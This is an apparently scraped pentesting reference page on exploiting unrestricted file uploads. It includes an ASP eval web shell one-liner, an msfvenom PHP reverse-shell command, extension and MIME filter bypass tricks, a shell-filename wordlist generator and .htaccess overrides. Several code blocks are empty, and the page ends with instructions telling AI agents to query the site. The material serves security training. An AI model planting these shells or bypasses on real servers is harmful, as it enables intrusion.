# Unrestricted File Upload Occurs when a user's files are taken as input and these files are not properly checked or sanitized. **Steps**: * Search for file upload points * Identify target language/framework, such as `php` and `asp`\ (ex. use [Wappalyzer](https://www.wappalyzer.com/) or ffuf with `index.`) * Try to upload executable files compatible with the target language/framework * Try to access the file for execution ## Web Shell Although reverse shells are always preferred over web shells because they provide the most interactive method of controlling the compromised server, they may not always work and we may have to rely on web shells instead. This can happen for a number of reasons, such as having a firewall on the back-end network that prevents outgoing connections or if the web server disables functions needed to initiate a connection with us. ### PHP {% code overflow="wrap" %} ```html

 ..  ..

``` {% endcode %} {% code overflow="wrap" %} ``` `?> ``` {% endcode %}


phpbash	A semi-interactive PHP shell
pentestmonkey	PHP reverse shell.
msfvenom	`msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php`

### .NET (.asp) {% code overflow="wrap" %} ```aspnet <% eval request('cmd') %> ``` {% endcode %} ### Other


SecLists	Web shell for different languages
laudanum	Same.
msfvenom	Like in PHP but also for other languages.
non-alphanumeric-webshell	Small php shell non alphanumeric

## SVG image See also [XXE](/rednote/pentesting-process/web-attacks/xxe.md). {% code overflow="wrap" %} ```xml ``` {% endcode %} {% code overflow="wrap" %} ```xml ]> ``` {% endcode %} {% code overflow="wrap" %} ```xml ]> ``` {% endcode %} ## Bypassing Filters ### Client-Side


JavaScript	Possibility to delete or modify the JavaScript code that performs the loading check.
Richieste	Intercept requests with BurpSuite and change the filename, data in the post, and Content-Type.

### Server-Side {% tabs %} {% tab title="Blacklist Filters" %} Test that the file extension is not in a list of prohibited extensions.


Fuzzing Extensions	Perform extension fuzzing in search of allowed extensions to bypass filtering. (BurpSuite Intruder, ffuf, etc.) Wordlists: .NET, PHP, ALL
Lower/Uppercase	It is possible to try lowercase and uppercase mixes. `php` —> `pHp`, `PhP`, `…`
Add Trailing Characters	Some components will strip or ignore trailing whitespaces, dots, and suchlike: `exploit.php.`
URL encoding	For dots, forward slashes, and backward slashes. If the value isn't decoded when validating the file extension, but is later decoded server-side, this can also allow you to upload malicious files that would otherwise be blocked: `exploit%2Ephp`
Stripping	`exploit.p.phphp`

{% endtab %} {% tab title="Whitelist Filters" %} Test that the file extension is in a list of allowed extensions.


Double Extensions	I can try double extension injection. The check could be done only on the first extension. If it is done on the last extension instead, it is possible that the first extension is considered in the reading phase
Character Injection	Insert different special characters in different places to cause the web application to misinterpret the filename and execute the uploaded file. Each character has a specific use case.

Use the [**generator**](#double-extension-generator-with-special-characters) below. {% endtab %} {% tab title="Type Filters" %} Many modern web servers and web applications also test the contents of the uploaded file to ensure that it matches the specified type.\ Two common methods for validation: **Content-Type header** or **File Content**.


Fuzzing Content-Type	If web server validates on the Content-Type field, you can try fuzzing that field to find allowed types.
MIME-Type	The type of a file is determined by its general format and byte structure, usually by checking the first few bytes of the file's contents, which contain the file's signature (magic bytes). ex. Add `GIF8` at the beginning

{% endtab %} {% endtabs %} #### Double Extension generator with special characters * In the first for put the special characters you want. * In the second for put the extensions you want. * Add the combinations you want. {% code overflow="wrap" %} ```bash for char in '%20' '%0a' '%00' '\x00' '%0d0a' '/' '.\\' '.' '…' ':' ';'; do for ext in '.php' '.phps'; do echo "shell$char$ext.jpg" >> wordlist.txt echo "shell$ext$char.jpg" >> wordlist.txt echo "shell.jpg$char$ext" >> wordlist.txt echo "shell.jpg$ext$char" >> wordlist.txt done done ``` {% endcode %} Check that wordlist files do not have `\r` at the end: `sed -i "s/\r$//" extensions.lst` ### Web Shell Upload via Path Traversal A directory to which user-supplied files are uploaded will likely have much stricter controls than other locations on the filesystem that are assumed to be out of reach for end users. If you can find a way to upload a script to a different directory that's not supposed to contain user-supplied files, the server may execute your script after all.\ Try with [path traversal](/rednote/pentesting-process/web-attacks/file-inclusion-path-traversal.md) in `filename` field in `multipart/form-data`. ### **Overriding the Server Configuration** Apache have the directives in `/etc/apache2/apache2.conf`.\ Many servers also allow developers to create special configuration files within individual directories in order to override or add to one or more of the global settings. You may occasionally find servers that fail to stop you from uploading your own malicious configuration file. In this case, even if the file extension you need is blacklisted, you may be able to trick the server into mapping an arbitrary, custom file extension to an executable MIME type. {% tabs %} {% tab title="Apache" %} File: `.htaccess` ```apacheconf LoadModule php_module /usr/lib/apache2/modules/libphp.so AddType application/x-httpd-php .php ``` ```apacheconf AddType application/x-httpd-php .l33t ``` {% endtab %} {% tab title="IIS" %} File: `web.config` ```xml ``` {% endtab %} {% endtabs %} ### Exploiting File Upload Race Conditions Some websites upload the file directly to the main filesystem and then remove it again if it doesn't pass validation. This kind of behavior is typical in websites that rely on anti-virus software and the like to check for malware. This may only take a few milliseconds, but for the short time that the file exists on the server, the attacker can potentially still execute it. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/web-attacks/unrestricted-file-upload.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.